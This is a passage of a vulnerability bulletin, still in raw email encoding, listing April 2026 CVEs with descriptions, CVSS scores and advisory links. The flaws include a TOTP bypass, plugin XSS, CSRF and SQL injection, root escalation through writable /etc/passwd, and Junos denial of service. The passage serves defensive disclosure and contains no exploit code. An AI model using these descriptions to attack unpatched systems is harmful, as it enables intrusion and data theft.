token without checking whether the matched user has TOTP two-factor authen= tication enabled. When a local user with TOTP enrolled is matched via the O= IDC email fallback mechanism, the second factor is completely skipped. This=
vulnerability is fixed in 2.3.0. 2026-04-10 7.4 CVE-2026-34727 [ https://w= ww.cve.org/CVERecord?id=3DCVE-2026-34727 ] https://github.com/go-vikunja/vi= kunja/security/advisories/GHSA-8jvc-mcx6-r4cg
=C2=A0 HDFGroup--hdf5 HDF5 is software for managing data. In 1.14.1-2 and e= arlier, a heap-use-after-free was found in the h5dump helper utility. An at= tacker who can supply a malicious h5 file can trigger a heap use-after-free=
. The freed object is referenced in a memmove call from H5T__conv_struct. T=
he original object was allocated by H5D__typeinfo_init_phase3 and freed by = H5D__typeinfo_term. 2026-04-09 7.8 CVE-2026-34734 [ https://www.cve.org/CVE= Record?id=3DCVE-2026-34734 ] https://github.com/HDFGroup/hdf5/security/advi= sories/GHSA-w7v2-9cmr-pwwj
=C2=A0 Analytify--Under Construction, Coming Soon & Maintenance Mode Cross-= Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, = Coming Soon & Maintenance Mode allows Cross Site Request Forgery.This issue=
affects Under Construction, Coming Soon & Maintenance Mode: from n/a throu=
gh 2.1.1. 2026-04-07 7.5 CVE-2026-34896 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-34896 ] https://patchstack.com/database/wordpress/plugin/under-= construction-maintenance-mode/vulnerability/wordpress-under-construction-co= ming-soon-maintenance-mode-plugin-2-1-1-cross-site-request-forgery-csrf-vul= nerability?_s_id=3Dcve
=C2=A0 Analytify--Simple Social Media Share Buttons Cross-Site Request Forg= ery (CSRF) vulnerability in Analytify Simple Social Media Share Buttons all= ows Cross Site Request Forgery.This issue affects Simple Social Media Share=
Buttons: from n/a through 6.2.0. 2026-04-07 7.5 CVE-2026-34904 [ https://w= ww.cve.org/CVERecord?id=3DCVE-2026-34904 ] https://patchstack.com/database/= wordpress/plugin/simple-social-buttons/vulnerability/wordpress-simple-socia= l-media-share-buttons-plugin-6-2-0-cross-site-request-forgery-csrf-vulnerab= ility?_s_id=3Dcve
=C2=A0=20

Back to top [ #top ]

Medium Vulnerabilities

Primary
Vendor -- Product Description Published CVSS Score Source Info Patch Info D= ynalon--MDwiki MDwiki contains a cross-site scripting vulnerability that al= lows remote attackers to execute arbitrary JavaScript by injecting maliciou=
s code through the location hash parameter. Attackers can craft URLs with J= avaScript payloads in the hash fragment that are parsed and rendered withou=
t sanitization, causing the injected scripts to execute in the victim's bro= wser context. 2026-04-12 6.1 CVE-2017-20239 [ https://www.cve.org/CVERecord= ?id=3DCVE-2017-20239 ] ExploitDB-46097 [ https://www.exploit-db.com/exploit= s/46097 ]
VulnCheck Advisory: MDwiki Cross-Site Scripting via Location Hash Parameter=
[ https://www.vulncheck.com/advisories/mdwiki-cross-site-scripting-via-loc= ation-hash-parameter ]
=C2=A0 NSauditor--SpotFTP Password Recover SpotFTP Password Recover 2.4.2 c= ontains a denial of service vulnerability that allows local attackers to cr= ash the application by supplying an oversized buffer in the Name field duri=
ng registration. Attackers can generate a 256-byte payload, paste it into t=
he Name input field, and trigger a crash when submitting the registration c= ode. 2026-04-12 6.2 CVE-2019-25711 [ https://www.cve.org/CVERecord?id=3DCVE= -2019-25711 ] ExploitDB-46088 [ https://www.exploit-db.com/exploits/46088 ] VulnCheck Advisory: SpotFTP Password Recover 2.4.2 Denial of Service via Na=
me Field [ https://www.vulncheck.com/advisories/spotftp-password-recover-de= nial-of-service-via-name-field ]
=C2=A0 NSauditor--BlueAuditor BlueAuditor 1.7.2.0 contains a buffer overflo=
w vulnerability in the registration key field that allows local attackers t=
o crash the application by submitting an oversized key value. Attackers can=
trigger a denial of service by entering a 256-byte buffer of repeated char= acters in the Key registration field, causing the application to crash duri=
ng registration processing. 2026-04-12 6.2 CVE-2019-25712 [ https://www.cve= .org/CVERecord?id=3DCVE-2019-25712 ] ExploitDB-46087 [ https://www.exploit-= db.com/exploits/46087 ]
VulnCheck Advisory: BlueAuditor 1.7.2.0 Buffer Overflow Denial of Service v=
ia Registration Key [ https://www.vulncheck.com/advisories/blueauditor-buff= er-overflow-denial-of-service-via-registration-key ]
=C2=A0 Synology--Synology SSL VPN Client A files or directories accessible =
to external parties vulnerability in Synology SSL VPN Client before 1.4.5-0= 684 allows remote attackers to access files within the installation directo=
ry via a local HTTP server bound to the loopback interface. By leveraging u= ser interaction with a crafted web page, attackers may retrieve sensitive f= iles such as configuration files, certificates, and logs, leading to inform= ation disclosure. 2026-04-10 6.5 CVE-2021-47960 [ https://www.cve.org/CVERe= cord?id=3DCVE-2021-47960 ] Synology-SA-26:05 Synology SSL VPN Client [ http= s://www.synology.com/en-global/security/advisory/Synology_SA_26_05 ]
=C2=A0 Adivaha--WordPress adivaha Travel Plugin WordPress adivaha Travel Pl= ugin 2.3 contains a reflected cross-site scripting vulnerability that allow=
s unauthenticated attackers to inject malicious scripts by manipulating the=
isMobile parameter. Attackers can craft malicious URLs containing JavaScri=
pt payloads in the isMobile GET parameter at the /mobile-app/v3/ endpoint t=
o execute arbitrary code in victims' browsers and steal session tokens or c= redentials. 2026-04-09 6.1 CVE-2023-54358 [ https://www.cve.org/CVERecord?i= d=3DCVE-2023-54358 ] ExploitDB-51663 [ https://www.exploit-db.com/exploits/= 51663 ]
Official Product Homepage [ https://www.adivaha.com/ ]
Product Reference [ https://wordpress.org/plugins/adiaha-hotel/ ]
VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 Reflected XSS via i= sMobile [ https://www.vulncheck.com/advisories/wordpress-adivaha-travel-plu= gin-reflected-xss-via-ismobile ]
=C2=A0 Jlexart--Joomla JLex Review Joomla JLex Review 6.0.1 contains a refl= ected cross-site scripting vulnerability that allows attackers to inject ma= licious scripts by manipulating the review_id URL parameter. Attackers can = craft malicious links containing JavaScript payloads that execute in victim=
s' browsers when clicked, enabling session hijacking or credential theft. 2= 026-04-09 6.1 CVE-2023-54360 [ https://www.cve.org/CVERecord?id=3DCVE-2023-= 54360 ] ExploitDB-51645 [ https://www.exploit-db.com/exploits/51645 ]
Official Product Homepage [ https://jlexart.com/ ]
Product Reference [ https://extensions.joomla.org/extension/jlex-review/ ] VulnCheck Advisory: Joomla JLex Review 6.0.1 Reflected XSS via review_id Pa= rameter [ https://www.vulncheck.com/advisories/joomla-jlex-review-reflected= -xss-via-review-id-parameter ]
=C2=A0 Thethinkery--Joomla iProperty Real Estate Joomla iProperty Real Esta=
te 4.1.1 contains a reflected cross-site scripting vulnerability that allow=
s attackers to inject malicious scripts by manipulating the filter_keyword = parameter. Attackers can craft URLs containing JavaScript payloads in the f= ilter_keyword GET parameter of the all-properties-with-map endpoint to exec= ute arbitrary code in victim browsers and steal session tokens or credentia= ls. 2026-04-09 6.1 CVE-2023-54361 [ https://www.cve.org/CVERecord?id=3DCVE-= 2023-54361 ] ExploitDB-51640 [ https://www.exploit-db.com/exploits/51640 ] Official Product Homepage [ http://thethinkery.net ]
Product Reference [ https://extensions.joomla.org/extension/vertical-market= s/real-estate/iproperty/ ]
VulnCheck Advisory: Joomla iProperty Real Estate 4.1.1 Reflected XSS via fi= lter_keyword [ https://www.vulncheck.com/advisories/joomla-iproperty-real-e= state-reflected-xss-via-filter-keyword ]
=C2=A0 Virtuemart--Cart Joomla VirtueMart Shopping-Cart 4.0.12 contains a r= eflected cross-site scripting vulnerability that allows attackers to inject=
malicious scripts by manipulating the keyword parameter. Attackers can cra=
ft malicious URLs containing script payloads in the keyword parameter of th=
e product-variants endpoint to execute arbitrary JavaScript in victim brows= ers and steal session tokens or credentials. 2026-04-09 6.1 CVE-2023-54362 =
[ https://www.cve.org/CVERecord?id=3DCVE-2023-54362 ] ExploitDB-51631 [ htt= ps://www.exploit-db.com/exploits/51631 ]
Official Product Homepage [ https://www.virtuemart.net/ ]
Product Reference [ https://demo.virtuemart.net/ ]
VulnCheck Advisory: Joomla VirtueMart Shopping-Cart 4.0.12 Reflected XSS vi=
a keyword [ https://www.vulncheck.com/advisories/joomla-virtuemart-shopping= -cart-reflected-xss-via-keyword ]
=C2=A0 Solidres--Joomla Solidres Joomla Solidres 2.13.3 contains a reflecte=
d cross-site scripting vulnerability that allows unauthenticated attackers =
to inject malicious scripts by manipulating multiple GET parameters includi=
ng show, reviews, type_id, distance, facilities, categories, prices, locati= on, and Itemid. Attackers can craft malicious URLs containing JavaScript pa= yloads in these parameters to steal session tokens, login credentials, or m= anipulate site content when victims visit the crafted links. 2026-04-09 6.1=
CVE-2023-54363 [ https://www.cve.org/CVERecord?id=3DCVE-2023-54363 ] Explo= itDB-51638 [ https://www.exploit-db.com/exploits/51638 ]
Official Product Homepage [ http://solidres.com/ ]
Product Reference [ https://extensions.joomla.org/extension/vertical-market= s/booking-a-reservations/solidres/ ]
VulnCheck Advisory: Joomla Solidres 2.13.3 Reflected XSS via Multiple Param= eters [ https://www.vulncheck.com/advisories/joomla-solidres-reflected-xss-= via-multiple-parameters ]
=C2=A0 Hikashop--Joomla HikaShop Joomla HikaShop 4.7.4 contains a reflected=
cross-site scripting vulnerability that allows unauthenticated attackers t=
o inject malicious scripts by manipulating GET parameters in the product fi= lter endpoint. Attackers can craft malicious URLs containing XSS payloads i=
n the from_option, from_ctrl, from_task, or from_itemid parameters to steal=
session tokens or login credentials when victims visit the link. 2026-04-0=
9 6.1 CVE-2023-54364 [ https://www.cve.org/CVERecord?id=3DCVE-2023-54364 ] = ExploitDB-51629 [ https://www.exploit-db.com/exploits/51629 ]
Official Product Homepage [ https://www.hikashop.com/ ]
Product Reference [ https://demo.hikashop.com/index.php/en/ ]
VulnCheck Advisory: Joomla HikaShop 4.7.4 Reflected XSS via Product Filter =
[ https://www.vulncheck.com/advisories/joomla-hikashop-reflected-xss-via-pr= oduct-filter ]
=C2=A0 IBM--Concert IBM Concert 1.0.0 through 2.2.0 creates temporary files=
with predictable names, which allows local users to overwrite arbitrary fi= les via a symlink attack. 2026-04-07 6.2 CVE-2025-13044 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2025-13044 ] https://www.ibm.com/support/pages/node/7= 268620
=C2=A0 elemntor--Elementor Website Builder more than just a page builder Th=
e Elementor Website Builder - More Than Just a Page Builder plugin for Word= Press is vulnerable to Stored Cross-Site Scripting via several widget param= eters in all versions up to, and including, 3.35.5 due to insufficient inpu=
t sanitization and output escaping. This makes it possible for authenticate=
d attackers, with Contributor-level access and above, to inject arbitrary w=
eb scripts in pages that will execute whenever a user accesses an injected = page. 2026-04-08 6.4 CVE-2025-14732 [ https://www.cve.org/CVERecord?id=3DCV= E-2025-14732 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/20= 232d70-72b2-47b7-ac7e-ad07892864ef?source=3Dcve https://plugins.trac.wordpress.org/browser/elementor/trunk/modules/wp-rest/= classes/elementor-post-meta.php#L67 https://plugins.trac.wordpress.org/changeset?old_path=3D/elementor/tags/3.3= 5.5&new_path=3D/elementor/tags/3.35.6
=C2=A0 Juniper Networks--Junos OS A=C2=A0Missing Authentication for Critica=
l Function vulnerability in command processing of Juniper Networks Junos OS=
allows a privileged local attacker to gain access to line cards running Ju= nos OS Evolved as root. This issue affects systems running Junos OS using L= inux-based line cards. Affected line cards include: * MPC7, MPC8, MPC9, MPC= 10, MPC11 * LC2101, LC2103 * LC480, LC4800, LC9600 * MX304 (built-in FPC) *=
MX-SPC3 * SRX5K-SPC3 * EX9200-40XS * FPC3-PTX-U2, FPC3-PTX-U3 * FPC3-SFF-P=
TX * LC1101, LC1102, LC1104, LC1105 This issue affects=C2=A0Junos OS:=C2=A0=
* all versions before 22.4R3-S8,=C2=A0 * from 23.2 before 23.2R2-S6,=C2=A0=
* from 23.4 before 23.4R2-S6,=C2=A0 * from 24.2 before 24.2R2-S3,=C2=A0 * = from 24.4 before 24.4R2, * from 25.2 before 25.2R2. 2026-04-08 6.7 CVE-2025= -30650 [ https://www.cve.org/CVERecord?id=3DCVE-2025-30650 ] https://github= .com/orangecertcc/security-research/security/advisories/GHSA-fwhc-gh5m-v8fq https://kb.juniper.net/JSA107863
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when accessing freed me= mory due to concurrent fence deregistration and signal handling. 2026-04-06=
6.5 CVE-2025-47374 [ https://www.cve.org/CVERecord?id=3DCVE-2025-47374 ] h= ttps://docs.qualcomm.com/product/publicresources/securitybulletin/april-202= 6-bulletin.html
=C2=A0 Siklu--EtherHaul 8010 Siklu EtherHaul 8010 siklu-uimage-nxp-enc-10_6= _2-18707-ea552dc00b devices have a static root password. 2026-04-08 6.4 CVE= -2025-57175 [ https://www.cve.org/CVERecord?id=3DCVE-2025-57175 ] https://s= emaja2.net/2025/04/30/siklu-eh-firmware-decryption/
=C2=A0 Red Hat--Red Hat Ansible Automation Platform 2 A container privilege=
escalation flaw was found in certain Ansible Automation Platform images. T= his issue arises from the /etc/passwd file being created with group-writabl=
e permissions during the build process. In certain conditions, an attacker = who can execute commands within an affected container, even as a non-root u= ser, can leverage their membership in the root group to modify the /etc/pas= swd file. This vulnerability allows an attacker to add a new user with any = arbitrary UID, including UID 0, gaining full root privileges within the con= tainer. 2026-04-08 6.4 CVE-2025-57847 [ https://www.cve.org/CVERecord?id=3D= CVE-2025-57847 ] https://access.redhat.com/security/cve/CVE-2025-57847 RHBZ#2391092 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2391092 ]
=C2=A0 Red Hat--Multicluster Engine for Kubernetes A container privilege es= calation flaw was found in certain Multicluster Engine for Kubernetes image=
s. This issue stems from the /etc/passwd file being created with group-writ= able permissions during build time. In certain conditions, an attacker who = can execute commands within an affected container, even as a non-root user,=
can leverage their membership in the root group to modify the /etc/passwd = file. This could allow the attacker to add a new user with any arbitrary UI=
D, including UID 0, leading to full root privileges within the container. 2= 026-04-08 6.4 CVE-2025-57851 [ https://www.cve.org/CVERecord?id=3DCVE-2025-= 57851 ] https://access.redhat.com/security/cve/CVE-2025-57851
RHBZ#2391104 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2391104 ]
=C2=A0 Red Hat--Red Hat Web Terminal A container privilege escalation flaw = was found in certain Web Terminal images. This issue stems from the /etc/pa= sswd file being created with group-writable permissions during build time. =
In certain conditions, an attacker who can execute commands within an affec= ted container, even as a non-root user, can leverage their membership in th=
e root group to modify the /etc/passwd file. This could allow the attacker =
to add a new user with any arbitrary UID, including UID 0, leading to full = root privileges within the container. 2026-04-08 6.4 CVE-2025-57853 [ https= ://www.cve.org/CVERecord?id=3DCVE-2025-57853 ] https://access.redhat.com/se= curity/cve/CVE-2025-57853
RHBZ#2391106 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2391106 ]
=C2=A0 Red Hat--Red Hat OpenShift Update Service A container privilege esca= lation flaw was found in certain OpenShift Update Service (OSUS) images. Th=
is issue stems from the /etc/passwd file being created with group-writable = permissions during build time. In certain conditions, an attacker who can e= xecute commands within an affected container, even as a non-root user, may =
be able to leverage their membership in the root group to modify the /etc/p= asswd file. This could allow the attacker to add a new user with any arbitr= ary UID, including UID 0, leading to full root privileges within the contai= ner. 2026-04-08 6.4 CVE-2025-57854 [ https://www.cve.org/CVERecord?id=3DCVE= -2025-57854 ] https://access.redhat.com/security/cve/CVE-2025-57854 RHBZ#2391107 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2391107 ]
=C2=A0 Red Hat--Red Hat Process Automation 7 A container privilege escalati=
on flaw was found in certain Red Hat Process Automation Manager images. Thi=
s issue stems from the /etc/passwd file being created with group-writable p= ermissions during build time. In certain conditions, an attacker who can ex= ecute commands within an affected container, even as a non-root user, can l= everage their membership in the root group to modify the /etc/passwd file. = This could allow the attacker to add a new user with any arbitrary UID, inc= luding UID 0, leading to full root privileges within the container. 2026-04= -08 6.4 CVE-2025-58713 [ https://www.cve.org/CVERecord?id=3DCVE-2025-58713 =
] https://access.redhat.com/security/cve/CVE-2025-58713
RHBZ#2394419 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2394419 ]
=C2=A0 Juniper Networks--Junos OS Evolved A Buffer Copy without Checking Si=
ze of Input ('Classic Buffer Overflow') vulnerability in the advanced forwa= rding toolkit (evo-aftmand/evo-pfemand) of Juniper Networks Junos OS Evolve=
d on PTX Series or QFX5000 Series allows an unauthenticated, adjacent attac= ker to cause a Denial of Service (DoS).An attacker sending crafted multicas=
t packets will cause line cards running evo-aftmand/evo-pfemand to crash an=
d restart or non-line card devices to crash and restart.=C2=A0Continued rec= eipt and processing of these packets will sustain the Denial of Service (Do=
S) condition. This issue affects Junos OS Evolved PTX Series: * All version=
s before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 befor=
e 23.4R2-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before=C2=A024.4R2= -EVO. This issue affects Junos OS Evolved on QFX5000 Series: * 22.2-EVO ver= sion before 22.2R3-S7-EVO, * 22.4-EVO version before 22.4R3-S7-EVO, * 23.2-= EVO versions before 23.2R2-S4-EVO, * 23.4-EVO versions before 23.4R2-S5-EVO=
, * 24.2-EVO versions before 24.2R2-S1-EVO, * 24.4-EVO versions before 24.4= R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved on QFX50=
00 Series versions before: 21.2R2-S1-EVO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EV=
O, and 22.1R1-EVO. 2026-04-09 6.5 CVE-2025-59969 [ https://www.cve.org/CVER= ecord?id=3DCVE-2025-59969 ] https://kb.juniper.net/JSA103159
=C2=A0 GitLab--GitLab GitLab has remediated an issue in GitLab EE affecting=
all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before=
18.10.3 that could have allowed an authenticated user to cause denial of s= ervice to the GitLab instance due to improper input validation in GraphQL q= ueries. 2026-04-08 6.5 CVE-2026-1101 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-1101 ] HackerOne Bug Bounty Report #3460228 [ https://hackerone.com= /reports/3460228 ]
https://gitlab.com/gitlab-org/gitlab/-/work_items/586488 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r= eleased/
=C2=A0 usystemsgmbh--Webling The Webling plugin for WordPress is vulnerable=
to Stored Cross-Site Scripting in all versions up to, and including, 3.9.0=
due to insufficient input sanitization, insufficient output escaping, and = missing capabilities checks in the 'webling_admin_save_form' and 'webling_a= dmin_save_memberlist' functions. This makes it possible for authenticated a= ttackers, with Subscriber-level access and above, to inject Webling forms a=
nd memberlists with arbitrary web scripts that will execute whenever an adm= inistrator views the related form or memberlist area of the WordPress admin=
. 2026-04-10 6.4 CVE-2026-1263 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-1263 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d= -0709-4fa2-9294-393ddcd05b22?source=3Dcve https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lis= ts/Form_List.php#L122 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lis= ts/Memberlist_List.php#L115 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/act= ions/save_form.php#L2 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/act= ions/save_memberlist.php#L2 https://plugins.trac.wordpress.org/changeset?old_path=3D%2Fwebling/tags/3.9= .0&new_path=3D%2Fwebling/tags/3.9.1
=C2=A0 magicplugins--Magic Conversation For Gravity Forms The Magic Convers= ation For Gravity Forms plugin for WordPress is vulnerable to Stored Cross-= Site Scripting via the 'magic-conversation' shortcode in all versions up to=
, and including, 3.0.97 due to insufficient input sanitization and output e= scaping on user supplied attributes. This makes it possible for authenticat=
ed attackers, with contributor-level access and above, to inject arbitrary = web scripts in pages that will execute whenever a user accesses an injected=
page. 2026-04-08 6.4 CVE-2026-1396 [ https://www.cve.org/CVERecord?id=3DCV= E-2026-1396 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/bc4= 25c4a-cb4e-4f50-b85b-8c4c7778c073?source=3Dcve https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-f= orms/trunk/main.php#L1627 https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-f= orms/tags/3.0.96/main.php#L1627 https://plugins.trac.wordpress.org/changeset/3482359/magic-conversation-for= -gravity-forms/trunk/main.php
=C2=A0 realmag777--BEAR Bulk Editor and Products Manager Professional for W= ooCommerce by Pluginus.Net The BEAR - Bulk Editor and Products Manager Prof= essional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable=
to Cross-Site Request Forgery in all versions up to, and including, 1.1.5.=
This is due to missing nonce validation on the woobe_redraw_table_row() fu= nction. This makes it possible for unauthenticated attackers to update WooC= ommerce product data including prices, descriptions, and other product fiel=
ds via a forged request granted they can trick a site administrator or shop=
manager into performing an action such as clicking on a link. 2026-04-08 6=
.5 CVE-2026-1672 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1672 ] https= ://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a29-4fa7-914= 6-d782adce0b1f?source=3Dcve https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#= L782
https://plugins.trac.wordpress.org/changeset/3457263/ https://plugins.trac.wordpress.org/changeset/3465138/
=C2=A0 wpeverest--User Registration & Membership Free & Paid Memberships, S= ubscriptions, Content Restriction, User Profile, Custom User Registration &=
Login Builder The User Registration & Membership - Free & Paid Memberships=
, Subscriptions, Content Restriction, User Profile, Custom User Registratio=
n & Login Builder plugin for WordPress is vulnerable to SQL Injection via t=
he 'membership_ids[]' parameter in all versions up to, and including, 5.1.2=
due to insufficient escaping on the user supplied parameter and lack of su= fficient preparation on the existing SQL query. This makes it possible for = authenticated attackers, with Subscriber-level access and above, to append = additional SQL queries into already existing queries that can be used to ex= tract sensitive information from the database. 2026-04-08 6.5 CVE-2026-1865=
[ https://www.cve.org/CVERecord?id=3DCVE-2026-1865 ] https://www.wordfence= .com/threat-intel/vulnerabilities/id/07c79459-66b8-4c93-a1cd-6e3ede95643f?s= ource=3Dcve https://plugins.trac.wordpress.org/changeset/3469042/user-registration
=C2=A0 n/a--Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R=
) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an e= scalation of privilege. Hardware reverse engineer adversary with a privileg=
ed user combined with a high complexity attack may enable escalation of pri= vilege. This result may potentially occur via physical access when attack r= equirements are present with special internal knowledge and requires no use=
r interaction. The potential vulnerability may impact the confidentiality (= high), integrity (none) and availability (none) of the vulnerable system, r= esulting in subsequent system confidentiality (high), integrity (high) and = availability (none) impacts. Use of Default Cryptographic Key in the hardwa=
re for some Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R=
) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an e= scalation of privilege. Hardware reverse engineer adversary with a privileg=
ed user combined with a high complexity attack may enable escalation of pri= vilege. This result may potentially occur via physical access when attack r= equirements are present with special internal knowledge and requires no use=
r interaction. The potential vulnerability may impact the confidentiality (= high), integrity (none) and availability (none) of the vulnerable system, r= esulting in subsequent system confidentiality (high), integrity (high) and = availability (none) impacts. 2026-04-08 6.6 CVE-2026-20709 [ https://www.cv= e.org/CVERecord?id=3DCVE-2026-20709 ] https://intel.com/content/www/us/en/s= ecurity-center/advisory/intel-sa-00609.html
=C2=A0 Juniper Networks--Junos Space An Improper Neutralization of Input Du= ring Web Page Generation ('Cross-site Scripting') vulnerability in Juniper = Networks Junos Space allows an attacker to inject script tags in the list f= ilter field that, when visited by another user, enables the attacker to exe= cute commands with the target's permissions, including an administrator. Th=
is issue affects all versions of Junos Space before 24.1R5 Patch V3. 2026-0= 4-09 6.1 CVE-2026-21904 [ https://www.cve.org/CVERecord?id=3DCVE-2026-21904=
] https://kb.juniper.net/JSA106003
=C2=A0 Juniper Networks--JSI LWC A Permissive List of Allowed Input vulnera= bility in the CLI of Juniper Networks Support Insights (JSI) Virtual Lightw= eight Collector (vLWC) allows a local, high privileged attacker to escalate=
their privileges to root. The CLI menu accepts input without carefully val= idating it, which allows for shell command injection. These shell commands = are executed with root permissions and can be used to gain complete control=
of the system. This issue affects all JSI vLWC versions before 3.0.94. 202= 6-04-09 6.7 CVE-2026-21915 [ https://www.cve.org/CVERecord?id=3DCVE-2026-21= 915 ] https://kb.juniper.net/JSA106016
=C2=A0 Juniper Networks--Junos OS An Incorrect Synchronization vulnerabilit=
y in the management daemon (mgd) of Juniper Networks Junos OS and Junos OS = Evolved allows a network-based attacker with low privileges to cause a comp= lete Denial-of-Service (DoS) of the management plane. When NETCONF sessions=
are quickly established and disconnected, a locking issue causes mgd proce= sses to hang in an unusable state. When the maximum number of mgd processes=
has been reached, no new logins are possible. This leads to the inability =
to manage the device and requires a power-cycle to recover. This issue can =
be monitored by checking for mgd processes in lockf state in the output of = 'show system processes extensive': user@host> show system processes extensi=
ve | match mgd <pid> root =C2=A0 =C2=A0 =C2=A0 20 =C2=A0 0 501M 4640K lockf=
=C2=A0 1 0:01 0.00% mgd If the system still can be accessed (either via th=
e CLI or as root, which might still be possible as last resort as this won'=
t invoke mgd), mgd processes in this state can be killed with 'request syst=
em process terminate <PID>' from the CLI or with 'kill -9 <PID>' from the s= hell.=C2=A0 This issue affects: Junos OS: * 23.4 versions before 23.4R2-S4,=
* 24.2 versions before 24.2R2-S1, * 24.4 versions before 24.4R1-S3, 24.4R2=
; This issue does not affect Junos OS versions before 23.4R1; Junos OS Evol= ved: * 23.4 versions before 23.4R2-S5-EVO, * 24.2 versions before 24.2R2-S1= -EVO, * 24.4 versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not=
affect Junos OS Evolved versions before 23.4R1-EVO; 2026-04-09 6.5 CVE-202= 6-21919 [ https://www.cve.org/CVERecord?id=3DCVE-2026-21919 ] https://kb.ju= niper.net/JSA106019
=C2=A0 addfunc--AddFunc Head & Footer Code The AddFunc Head & Footer Code p= lugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `a= Fhfc_head_code`, `aFhfc_body_code`, and `aFhfc_footer_code` post meta value=
s in all versions up to, and including, 2.3. This is due to the plugin outp= utting these meta values without any sanitization or escaping. While the pl= ugin restricts its own metabox and save handler to administrators via `curr= ent_user_can('manage_options')`, it does not use `register_meta()` with an = `auth_callback` to protect these meta keys. This makes it possible for auth= enticated attackers, with Contributor-level access and above, to inject arb= itrary web scripts via the WordPress Custom Fields interface that execute w= hen an administrator previews or views the post. 2026-04-10 6.4 CVE-2026-23=
05 [ https://www.cve.org/CVERecord?id=3DCVE-2026-2305 ] https://www.wordfen= ce.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6= ?source=3Dcve https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.= 3/addfunc-head-footer-code.php#L63 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.= 3/addfunc-head-footer-code.php#L74 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.= 3/addfunc-head-footer-code.php#L85 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/a= ddfunc-head-footer-code.php#L63 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/a= ddfunc-head-footer-code.php#L74 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/a= ddfunc-head-footer-code.php#L85 https://plugins.trac.wordpress.org/changeset?old_path=3D%2Faddfunc-head-foo= ter-code/tags/2.3&new_path=3D%2Faddfunc-head-footer-code/tags/2.4
=C2=A0 blubrry--PowerPress Podcasting plugin by Blubrry The Blubrry PowerPr= ess plugin for WordPress is vulnerable to Stored Cross-Site Scripting via t=
he 'powerpress' and 'podcast' shortcodes in versions up to, and including, = 11.15.15 due to insufficient input sanitization and output escaping. This m= akes it possible for authenticated attackers, with contributor-level access=
and above, to inject arbitrary web scripts in pages that will execute when= ever a user accesses an injected page. 2026-04-08 6.4 CVE-2026-2988 [ https= ://www.cve.org/CVERecord?id=3DCVE-2026-2988 ] https://www.wordfence.com/thr= eat-intel/vulnerabilities/id/de25459d-9e19-4e3e-982f-0b34fa89dc30?source=3D= cve
https://plugins.trac.wordpress.org/changeset/3473781/powerpress
=C2=A0 fernandobt--List category posts The List category posts plugin for W= ordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cat= list' shortcode in all versions up to, and including, 0.94.0 due to insuffi= cient input sanitization and output escaping on user supplied attributes. T= his makes it possible for authenticated attackers, with contributor-level a= ccess and above, to inject arbitrary web scripts in pages that will execute=
whenever a user accesses an injected page. 2026-04-09 6.4 CVE-2026-3005 [ = https://www.cve.org/CVERecord?id=3DCVE-2026-3005 ] https://www.wordfence.co= m/threat-intel/vulnerabilities/id/1a93ff8a-364f-4ec4-9c32-208c7a3e1fc1?sour= ce=3Dcve https://plugins.trac.wordpress.org/browser/list-category-posts/trunk/includ= e/lcp-thumbnail.php#L95
https://plugins.trac.wordpress.org/changeset/3482733/
=C2=A0 uniquecodergmailcom--Pinterest Site Verification plugin using Meta T=
ag The Pinterest Site Verification plugin using Meta Tag plugin for WordPre=
ss is vulnerable to Stored Cross-Site Scripting via the 'post_var' paramete=
r in versions up to, and including, 1.8 due to insufficient input sanitizat= ion and output escaping. This makes it possible for authenticated attackers=
, with subscriber-level access and above, to inject arbitrary web scripts i=
n pages that will execute whenever a user accesses an injected page. 2026-0= 4-08 6.4 CVE-2026-3142 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3142 ]=
